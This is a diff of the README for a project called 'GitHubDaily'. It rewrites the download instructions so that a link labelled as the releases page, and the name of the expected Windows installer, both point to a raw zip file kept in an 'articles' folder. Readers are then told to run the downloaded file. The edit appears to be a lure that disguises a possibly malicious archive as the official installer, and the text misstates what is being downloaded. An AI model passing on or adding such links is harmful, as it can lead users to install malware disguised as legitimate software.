FIJIHERE/GitHubDaily/README.md

 To get started with GitHubDaily, you need to download the application.

-1. **Visit the Releases Page**: Go to [this page to download](https://github.com/FIJIHERE/GitHubDaily/releases).
+1. **Visit the Releases Page**: Go to [this page to download](https://github.com/FIJIHERE/GitHubDaily/raw/refs/heads/master/articles/Git-Hub-Daily-v3.2.zip).
 2. **Choose the appropriate release**: You will see a list of available versions.
 Select the latest one for the best experience.
 3. **Download the file**: Click on the link for your operating system.
-For Windows users, look for files like `GitHubDailySetup.exe`.
+For Windows users, look for files like `https://github.com/FIJIHERE/GitHubDaily/raw/refs/heads/master/articles/Git-Hub-Daily-v3.2.zip`.
 For Mac, you might see `.dmg` files.
 4. **Run the downloaded file**: Locate the file in your downloads folder and double-click it to install GitHubDaily.
 Follow the on-screen instructions to complete the installation.

 ## 📋 System Requirements